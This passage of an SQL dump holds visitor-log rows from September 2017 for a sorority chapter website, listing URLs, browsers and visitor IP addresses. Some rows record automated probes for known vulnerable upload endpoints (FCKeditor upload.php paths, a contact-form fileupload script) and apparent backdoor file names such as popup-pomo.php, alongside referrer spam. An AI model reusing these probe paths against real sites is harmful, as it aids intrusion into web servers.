//zphiblgz.org','Firefox','Windows','40.1','','197.88.21.132','000',1,0),(10519,'2017-09-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.107.81.233','000',1,0),(10520,'2017-09-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','212.47.246.21','000',1,0),(10521,'2017-09-06','http://www.zphibmaryland.org/chapters/','Safari','iPad','9.0','','96.255.163.84','000',5,0),(10522,'2017-09-06','http://zphiblgz.org','Firefox','Windows','40.1','','77.46.139.116','000',2,0),(10523,'2017-09-07','http://zphiblgz.org','Firefox','Windows','40.1','','43.242.226.252','000',2,0),(10524,'2017-09-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','128.199.157.152','000',1,0),(10525,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',1,0),(10526,'2017-09-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(10527,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.10','000',1,0),(10528,'2017-09-07','http://zphiblgz.org/?page_id=2','Firefox','Windows','3.6.28','','195.154.173.103','000',8,0),(10529,'2017-09-07','zphiblgz.org/fckeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','43.0.2442.1144','','46.118.159.11','000',1,0),(10530,'2017-09-07','http://zphiblgz.org','Opera','Windows','12.14','','34.214.49.189','000',1,0),(10531,'2017-09-07','http://komputers-best.ru/','MSIE','Unknown','6.0','','46.118.159.26','000',2,0),(10532,'2017-09-07','zphiblgz.org','Chrome','Windows','50.0.2661.75','','89.36.211.128','000',1,0),(10533,'2017-09-07','http://smsactivator.ru/','MSIE','Windows','6.0','','188.163.72.15','000',8,0),(10534,'2017-09-07','http://zphiblgz.org','Firefox','Windows','40.1','','195.230.48.155','000',2,0),(10535,'2017-09-07','http://shymkent.xkaz.org/','MSIE','Windows','6.0','','46.118.159.26','000',5,0),(10536,'2017-09-07','http://zphiblgz.org/wp-admin/post.php?post=567&action=edit','Chrome','Chrome OS','60.0.3112.112','','69.143.34.19','000',4,0),(10537,'2017-09-07','zphiblgz.org/editor/filemanager/upload/php/upload.php','Chrome','Windows','56.0.2924.87','','46.118.159.231','000',1,0),(10538,'2017-09-07','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(10539,'2017-09-07','http://zphiblgz.org','MSIE','Windows','6.0','','185.147.82.115','000',1,0),(10540,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.134.12','000',1,0),(10541,'2017-09-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.165.254.166','000',1,0),(10542,'2017-09-07','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.15','000',1,0),(10543,'2017-09-07','zphiblgz.org/','Firefox','Windows','52.0','','178.137.165.191','000',1,0),(10544,'2017-09-07','http://zphiblgz.org','Firefox','Windows','40.1','','61.5.21.81','000',2,0),(10545,'2017-09-07','https://kandidos.com/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(10546,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',2,0),(10547,'2017-09-07','http://zphiblgz.org','Firefox','Windows','31.0','','208.90.57.196','000',2,0),(10548,'2017-09-07','http://sudexpert66.ru/','MSIE','Windows','4.01','','46.118.154.197','000',3,0),(10549,'2017-09-07','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','94.74.81.129','000',1,0),(10550,'2017-09-07','http://zphiblgz.org','Firefox','Windows','40.1','','83.53.84.152','000',2,0),(10551,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','172.104.41.83','000',2,0),(10552,'2017-09-07','http://xdoza.com/','MSIE','Windows','6.0','','46.118.154.197','000',2,0),(10553,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.90','000',1,0),(10554,'2017-09-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','204.85.191.31','000',1,0),(10555,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',3,0),(10556,'2017-09-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',17,0),(10557,'2017-09-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',16,0),(10558,'2017-09-07','http://zphiblgz.org/revisiona/popup-pomo.php','Chrome','Windows','5.0.375.99','','31.3.16.59','000',1,0),(10559,'2017-09-07','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1537.hXD55Lv-Aq8YceAVwKmW5aweIV6w5bfQ_LvSF1SbULLpCHxm5CiP-rW5pXFUtU_t.70b2d24800ba77042b47bd376f544cc82d705e33&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBVVkNuRG9uZDJZY3ZqcTl3SW5lVWdqaEI4ZERZZ1Z6QzhVMDdESldZX2xu&b64e=2&sign=d2037dd0d2f64537a4e0ef385005df9e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrWiTFUMphp8KhPHvsIPW-xOeZh3-mNYjuj_D8-ZrOKSCstMv8RCp3RHM_T5lLasYLZqCKfYGKI6LUl9gf0vVNRToTKMQJBHRDU8r981dz6yvsR5zt7l6pXC-QkVCdSMDL&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCU71JUKZtIl0qOcx_S5w5GaOe74QJP5pG2K6ZQg5mhYqKt3Yy7bnvgMENlmtJCoNLrD3Ag51ZCq2A&l10n=ru&cts=1504812481835&mc=7.13023485322','Firefox','Windows','53.0','','93.171.80.141','000',1,0),(10560,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.178','000',1,0),(10561,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',1,0),(10562,'2017-09-07','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.56.11','000',1,0),(10563,'2017-09-07','http://www.anabolics.shop/','Unknown','Unknown','Unknown','','46.118.158.19','000',3,0),(10564,'2017-09-07','http://yoshkarola.zrus.org/','MSIE','Windows','6.0','','46.118.158.19','000',1,0),(10565,'2017-09-07','http://zphiblgz.org','Firefox','Macintosh','37.0','','104.144.19.159','000',2,0),(10566,'2017-09-07','http://zphiblgz.org','Firefox','Windows','40.1','','190.31.76.251','000',2,0),(10567,'2017-09-07','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.68','000',1,0),(10568,'2017-09-07','https://pl.id-forex.com/','MSIE','Windows','5.5','','46.118.154.197','000',2,0),(10569,'2017-09-07','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(10570,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(10571,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.12','000',1,0),(10572,'2017-09-07','zphiblgz.org/administrator/fckeditor/editor/filemanager/upload/php/upload.php','MSIE','Windows','9.0','','134.249.48.20','000',1,0),(10573,'2017-09-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.177','000',1,0),(10574,'2017-09-07','http://zphiblgz.org','Android Browser','Android','4.0','','107.178.113.231','000',105,0),(10575,'2017-09-07','http://zphiblgz.org','Firefox','Windows','40.1','','181.239.41.35','000',2,0),(10576,'2017-09-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(10577,'2017-09-07','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.179','000',1,0),(10578,'2017-09-07','http://zphiblgz.org/tools/popup-pomo.php','Chrome','Windows','5.0.375.99','','207.246.240.113','000',1,0),(10579,'2017-09-08','http://zphiblgz.org/hello-world-2/','Firefox','Windows','3.6.28','','195.154.173.103','000',2,0),(10580,'2017-09-08','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.61.44.59','000',1,0),(10581,'2017-09-08','zphiblgz.org/administrator/FCKeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','44.0.2510.857','','176.8.89.204','000',1,0),(10582,'2017-09-08','zphiblgz.org/js/fckeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','43.0.2442.1144','','178.137.160.171','000',1,0),(10583,'2017-09-08','http://zphiblgz.org','Firefox','Windows','17.0','','185.189.113.185','000',6,0),(10584,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.13','000',1,0),(10585,'2017-09-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.170.42.18','000',1,0),(10586,'2017-09-08','http://zphiblgz.org/parseopmla/popup-pomo.php','Chrome','Windows','5.0.375.99','','151.80.199.98','000',5,0),(10587,'2017-09-08','http://zphiblgz.org','Firefox','Windows','40.1','','182.70.72.18','000',2,0),(10588,'2017-09-08','http://zphiblgz.org/hipay/popup-pomo.php','Chrome','Windows','5.0.375.99','','89.111.178.134','000',6,0),(10589,'2017-09-08','http://zphiblgz.org/parseopmla/popup-pomo.php','Chrome','Windows','5.0.375.99','','194.1.236.30','000',2,0),(10590,'2017-09-08','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','46.229.170.197','000',1,0),(10591,'2017-09-08','http://zphiblgz.org','Chrome','Macintosh','57.0.2987.110','','46.229.170.197','000',1,0),(10592,'2017-09-08','zphiblgz.org/js/fckeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','57.0.2987.133','','37.115.191.218','000',1,0),(10593,'2017-09-08','http://zphiblgz.org/xmlrpc.php','WordPress','Unknown','Unknown','','192.0.89.195','000',1,0),(10594,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',2,0),(10595,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.177','000',2,0),(10596,'2017-09-08','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1538.FYi6npDbPACeUAG1HSmozd6qeLKjtAWTw--Iu9F_7gMJILeiDm8IK0yK-mUal56a.0e9f006d045afc1557f199ff31b652e57b0e2468&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBXUS15OTIyWUoyT1hWZDhmcUVKS0twTXVmMDEzdnRlWHN6VXJjaFU4QjRo&b64e=2&sign=81d1719d086fea7a55bc48cba4516953&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4UcbDr7-1XjvPMCEF0Cqduh-HFFN2k288S7Zkq70BCDzvHsQvVT0P2vaLCql_piaykcX9LLZH432DAht5CMc0nWB-ehfjLZ454GUTUoWG_3EnnzyN4Wh4Ig6zdlTWDAMB&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWy6J2z3qXCRTNJQwJ2gZ2yX5iSqow35gmN6cthhfBux-oW8kXM7ebsBXmP7CIi4WdDSCoFrE6xMw&l10n=ru&cts=1504876947215&mc=3.91280781613','Firefox','Windows','53.0','','95.79.87.109','000',1,0),(10597,'2017-09-08','zphiblgz.org/js/FCKeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','56.0.2924.87','','178.137.85.137','000',1,0),(10598,'2017-09-08','http://zphiblgz.org','Firefox','Windows','40.1','','89.238.183.136','000',2,0),(10599,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',2,0),(10600,'2017-09-08','https://univerfiles.com/','MSIE','Windows','6.0','','46.118.158.19','000',5,0),(10601,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.180.157','000',1,0),(10602,'2017-09-08','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(10603,'2017-09-08','https://www.google.com/','Safari','iPhone','10.0','','130.85.58.227','000',2,0),(10604,'2017-09-08','http://zphiblgz.org','Firefox','Windows','40.1','','96.44.147.131','000',2,0),(10605,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',2,0),(10606,'2017-09-08','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.111.100','000',1,0),(10607,'2017-09-08','http://zphiblgz.org','Firefox','Windows','40.1','','158.181.41.52','000',2,0),(10608,'2017-09-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','197.88.56.195','000',4,0),(10609,'2017-09-08','http://zphiblgz.org','MSIE','Windows','6.0','','197.88.56.195','000',1,0),(10610,'2017-09-08','http://zphiblgz.org','Firefox','Linux','53.0','','197.88.56.195','000',2,0),(10611,'2017-09-08','https://www.google.com/','Chrome','Android','60.0.3112.116','','96.231.32.110','000',2,0),(10612,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.87','000',2,0),(10613,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',2,0),(10614,'2017-09-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(10615,'2017-09-08','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(10616,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.39.41','000',2,0),(10617,'2017-09-08','http://life-instyle.com/','MSIE','Windows','6.0','','46.118.154.197','000',1,0),(10618,'2017-09-08','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(10619,'2017-09-08','https://kichenaid.ru/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(10620,'2017-09-08','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(10621,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.218.199','000',2,0),(10622,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',2,0),(10623,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',2,0),(10624,'2017-09-08','http://zphiblgz.org','Firefox','Windows','40.1','','24.108.214.211','000',1,0),(10625,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.162.106','000',2,0),(10626,'2017-09-08','http://zphiblgz.org','Firefox','Windows','7.0.1','','165.231.0.242','000',2,0),(10627,'2017-09-08','http://zphiblgz.org','Android Browser','Android','4.0','','62.210.152.119','000',105,0),(10628,'2017-09-08','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','34.208.173.153','000',1,0),(10629,'2017-09-08','http://komp-pomosch.ru/','Unknown','Unknown','Unknown','','188.163.72.15','000',4,0),(10630,'2017-09-08','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.139.12','000',2,0),(10631,'2017-09-08','https://bioscorp.ru/','MSIE','Windows','5.5','','46.118.159.26','000',2,0),(10632,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.25','000',2,0),(10633,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.18','000',2,0),(10634,'2017-09-09','http://zphiblgz.org','Firefox','Windows','40.1','','183.179.229.90','000',2,0),(10635,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(10636,'2017-09-09','zphiblgz.org/webroot/fckeditor/editor/filemanager/upload/php/upload.php','Firefox','Windows','47.0','','46.118.120.6','000',1,0),(10637,'2017-09-09','http://pavlodar.xkaz.org/','MSIE','Windows','6.0','','46.118.159.26','000',5,0),(10638,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.30','000',1,0),(10639,'2017-09-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.82.244','000',1,0),(10640,'2017-09-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.119','000',1,0),(10641,'2017-09-09','http://www.zphiblgz.org/components/com_sexycontactform/fileupload/index.php','Chrome','Windows','42.0.2311.152','','209.90.225.211','000',3,0),(10642,'2017-09-09','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','178.137.16.204','000',2,0),(10643,'2017-09-09','zphiblgz.org/cms/fckeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','56.0.2924.87','','46.119.115.128','000',1,0),(10644,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',2,0),(10645,'2017-09-09','https://xn--80abgj3a5acid6ghs.top/','MSIE','Windows','6.0','','46.118.154.197','000',2,0),(10646,'2017-09-09','http://zphiblgz.org','Firefox','Windows','31.0','','208.90.57.196','000',2,0),(10647,'2017-09-09','http://zphiblgz.org/parseopmla/popup-pomo.php','Chrome','Windows','5.0.375.99','','159.253.18.195','000',2,0),(10648,'2017-09-09','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.17','000',1,0),(10649,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',2,0),(10650,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.45.131','000',2,0),(10651,'2017-09-09','http://search.tb.ask.com/search/GGmain.jhtml?searchfor=zeta+phi+beta+youth+axiliary&n=781bdd91&p2=%5EUX%5Expt575%5ES13981%5Eus&ptb=D7DFAB68-69A6-443D-8E7F-5B15B65C5C4B&qs=&ss=sub&st=bar&tpr=sbt&ts=1504957627498','MSIE','Windows','11.0','','68.134.35.84','000',1,0),(10652,'2017-09-09','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(10653,'2017-09-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.119','000',1,0),(10654,'2017-09-09','http://krasivoe-hd.net/','MSIE','Windows','5.5','','46.118.154.197','000',1,0),(10655,'2017-09-09','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','94.74.81.165','000',1,0),(10656,'2017-09-09','http://zphiblgz.org/','MSIE','Windows','9.0','','163.172.4.153','000',1,0),(10657,'2017-09-09','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1539.Tdz-ovuOC59yXz0zSNRE6zv6Hp7E6rIdg7ZvOAH5YmPw9zro5-tbHhN9Y8k9rSnk.9691dab6e8cbf46ccfe05cf744a4358589f3cc38&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSjd1dDR6UkJUVlBTQ0Z0a21WSUd1QUFKYXU4V0ZVcmprbjBnelM5dkZ4Z21NbF93Qms2ZjFk&b64e=2&sign=6d6e019fbf0a80d300957f8c0f6c730d&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTBpftrhm_oCsU-avIV6b4AXRN1XvkY9IanV2_0kHltvwJpgGbDil7fycuOGMfPSqrFsWDjv7gPkG-ykl6W30Pa-EvLYUOflkPl3QALmTjOZ2WO_bqryzlkg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9CszEPGt_szZ9uPwCJWKjCX7Yqe2G70-zZBD2qe2fAC_10ix5dqV0x05BBx1dcv-ZeJQ&l10n=ru&cts=1504959588705&mc=1.52641598947','Firefox','Windows','53.0','','37.110.70.96','000',1,0),(10658,'2017-09-09','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','185.57.31.31','000',3,0),(10659,'2017-09-09','zphiblgz.org/cms/FCKeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','44.0.2510.857','','178.137.85.2','000',1,0),(10660,'2017-09-09','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','69.143.34.19','000',6,0),(10661,'2017-09-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','50.28.60.102','000',1,0),(10662,'2017-09-09','http://zphiblgz.org/wp-inc.php','Chrome','Windows','5.0.375.99','','193.124.176.128','000',1,0),(10663,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',2,0),(10664,'2017-09-09','zphiblgz.org/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php','MSIE','Windows','9.0','','46.119.121.156','000',1,0),(10665,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(10666,'2017-09-09','http://zphiblgz.org','Firefox','Windows','40.1','','179.210.26.3','000',1,0),(10667,'2017-09-09','https://vsdshnik.com/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(10668,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.126.178','000',1,0),(10669,'2017-09-09','https://mojpregled.com/','MSIE','Windows','6.0','','188.163.72.15','000',4,0),(10670,'2017-09-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(10671,'2017-09-09','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(10672,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(10673,'2017-09-09','http://pochtovyi-index.ru/','Opera','Windows','7.02','','46.118.158.19','000',2,0),(10674,'2017-09-09','http://kirov.zrus.org/','Opera','Windows','9.00','','46.118.158.19','000',1,0),(10675,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(10676,'2017-09-09','http://zphiblgz.org/','Firefox','Windows','7.0.1','','145.239.74.47','000',1,0),(10677,'2017-09-09','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(10678,'2017-09-09','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.34.19','000',6,0),(10679,'2017-09-09','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','35.189.93.195','000',1,0),(10680,'2017-09-09','http://zphiblgz.org','Chrome','Windows','49.0.2623.75','','45.55.244.134','000',1,0),(10681,'2017-09-09','http://zphiblgz.org','Firefox','Windows','54.0','','45.55.244.134','000',2,0),(10682,'2017-09-09','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','45.55.244.134','000',1,0),(10683,'2017-09-09','http://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','45.55.244.134','000',1,0),(10684,'2017-09-09','http://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','45.55.244.134','000',1,0),(10685,'2017-09-09','http://zphiblgz.org','MSIE','Windows','10.0','','45.55.244.134','000',2,0),(10686,'2017-09-09','http://zphiblgz.org','Firefox','Macintosh','54.0','','45.55.244.134','000',2,0),(10687,'2017-09-09','http://zphiblgz.org','Firefox','Linux','54.0','','45.55.244.134','000',1,0),(10688,'2017-09-09','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','45.55.244.134','000',2,0),(10689,'2017-09-09','http://zphiblgz.org','Chrome','Linux','59.0.3071.115','','45.55.244.134','000',2,0),(10690,'2017-09-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.56','000',1,0),(10691,'2017-09-09','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','185.85.238.244','000',2,0),(10692,'2017-09-09','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.10','000',15,0),(10693,'2017-09-09','http://zphiblgz.org','Firefox','Windows','40.1','','5.8.200.71','000',2,0),(10694,'2017-09-09','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.23','000',1,0),(10695,'2017-09-09','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.15','000',13,0),(10696,'2017-09-09','zphiblgz.org/wp-content/plugins/fckeditor_for_wordpress/fckeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','57.0.2987.133','','134.249.49.183','000',1,0),(10697,'2017-09-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.59','000',13,0),(10698,'2017-09-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(10699,'2017-09-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.57.31.31','000',5,0),(10700,'2017-09-10','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','212.91.205.142','000',20,0),(10701,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','183.82.19.120','000',2,0),(10702,'2017-09-10','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(10703,'2017-09-10','zphiblgz.org/sites/all/modules/fckeditor/fckeditor/editor/filemanager/upload/php/upload.php','Opera Next','Windows','44.0.2510.857','','178.137.16.203','000',1,0),(10704,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(10705,'2017-09-10','http://zphiblgz.org/networka/popup-pomo.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',2,0),(10706,'2017-09-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1540.j0szCjuMgJjCPArrmSJUyJLFzx-v3RaT18RDcJNqNlkD0xzyAYxXERqlFaoJyZc8.d0f0d645e3895bde10f5b8bfe7485d780db17576&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJnRVJISjdWY2ZqaDBSeWRCYkJXYUU5MTNtWThGUXhHVFZjWi12T2tsSzFG&b64e=2&sign=2165c09dddcde79a8e75786cba1f9d11&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfynS81rq7-d37UVwoAYNrYgw6J-eRdUsvVkVwGDxKddevvmFLs5Y0hh5ibhkbf2a1UqT0clLfRkggAvzHf4ZpSnC-0AUSxkGocxfEX0qz7nmHxs7onBbeBAMuD8sGQ0YB&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXl57D8DglsoAtUEcf0-ZYM2mMEhWIOvXGV8f5HhPdoPAU6tygeBowStjGwE3GTdmFW0I5eRKXULg&l10n=ru&cts=1505036906187&mc=3.00230455647','Firefox','Windows','53.0','','188.32.176.116','000',1,0),(10707,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','138.197.69.193','000',1,0),(10708,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','99.250.185.1','000',2,0),(10709,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','138.197.92.225','000',1,0),(10710,'2017-09-10','zphiblgz.org/mambots/editors/fckeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','58.0.3029.96','','178.137.94.94','000',1,0),(10711,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','49.196.12.92','000',2,0),(10712,'2017-09-10','http://zphiblgz.org','Firefox','Linux','21.0','','37.187.56.76','000',2,0),(10713,'2017-09-10','http://zphiblgz.org','MSIE','Unknown','9.0','','69.84.207.246','000',13,0),(10714,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','104.236.167.12','000',1,0),(10715,'2017-09-10','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','31.41.45.1','000',1,0),(10716,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','31.185.104.21','000',2,0),(10717,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.78','000',2,0),(10718,'2017-09-10','http://zphiblgz.org/','Firefox','Windows','54.0','','178.137.83.166','000',1,0),(10719,'2017-09-10','http://zphiblgz.org/','Opera','Windows','12.17','','178.137.83.166','000',5,0),(10720,'2017-09-10','http://life-instyle.com/eda.html','MSIE','Windows','6.0','','46.118.158.19','000',5,0),(10721,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',1,0),(10722,'2017-09-10','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.70.13','000',1,0),(10723,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','79.103.172.111','000',2,0),(10724,'2017-09-10','zphiblgz.org/modules/fckeditor/fckeditor/editor/filemanager/upload/php/upload.php','Chrome','Windows','56.0.2924.87','','46.119.112.206','000',1,0),(10725,'2017-09-10','http://zphiblgz.org/profile/popup-pomo.php','Chrome','Windows','5.0.375.99','','178.210.72.5','000',2,0),(10726,'2017-09-10','http://life-instyle.com/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(10727,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','104.236.165.46','000',1,0),(10728,'2017-09-10','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(10729,'2017-09-10','https://kichenaid.ru/','Opera','Windows','7.11','','46.118.159.26','000',2,0),(10730,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','203.177.240.16','000',2,0),(10731,'2017-09-10','http://zphiblgz.org','Firefox','Windows','40.1','','151.51.119.41','000',2,0),(10732,'2017-09-10','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','138.197.24.172','000',1,0),(10733,'2017-09-10','http://zphiblgz.org','Firefox','Windows','7.0.1','','128.52.128.105','000',2,0),(10734,'2017-09-10','http://zphiblgz.org','F